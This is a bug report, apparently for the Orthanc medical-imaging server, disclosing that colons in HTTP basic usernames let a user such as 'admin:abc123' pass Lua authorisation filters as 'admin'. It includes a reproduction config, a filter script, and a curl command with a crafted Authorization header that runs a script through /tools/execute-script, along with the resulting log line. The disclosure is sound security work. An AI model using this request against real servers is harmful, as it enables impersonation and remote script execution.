**Details**

Users can impersonate other users when HTTP basic authentication + authorisation filters are in use, and if they can control their own username. This is due to colons being allowed in HTTP basic usernames, which should be forbidden according to the spec.

The first colon in the "user:pass" string is used to separate out the username, so if a username is for example "admin:user1" then authorisation filters will see the user as "admin".

This does require convincing an admin to add a suspicious username to the config, so exploitation may be unlikely.


**What steps will reproduce the problem?**

Config:
{
  "Name" : "${ORTHANC_NAME} in Docker Compose",
  "RemoteAccessAllowed" : true,
  "ExecuteLuaEnabled": true,
  "RegisteredUsers" : {
    "admin": "admin",
    "admin:abc123": "password",
    "user1": "password1"
  }
}

Lua authorisation filter:
function IncomingHttpRequestFilter(method, uri, ip, username, httpHeaders)
   -- Only allow GET requests for non-admin users
   print("Lua filter: '" .. username .. "' -> '" .. uri .. "'")
  if method == 'GET' then
      return true
   elseif username == 'admin' then
      return true
   else
      return false
   end
end

After loading the auth filter, we can try to run a script while logged in as "admin:abc123", returning a 200 response:
curl http://localhost:8042/tools/execute-script --data-binary @auth.lua -i -H 'Authorization: Basic YWRtaW46YWJjMTIzOnBhc3N3b3Jk'

The filter prints out the username "admin":
[orthanc] | W0923 01:12:26.883583           HTTP-8 LuaContext.cpp:95] Lua says: Lua filter: 'admin' -> '/tools/execute-script'


**What is the expected output? What do you see instead?**

The curl request returns a 200 response where it should return a 403. The lua filter prints out the username "admin" instead of "admin:abc123".


**What version of the product are you using? On what operating system?**

Docker image jodogne/orthanc-plugins:1.12.9 on Linux.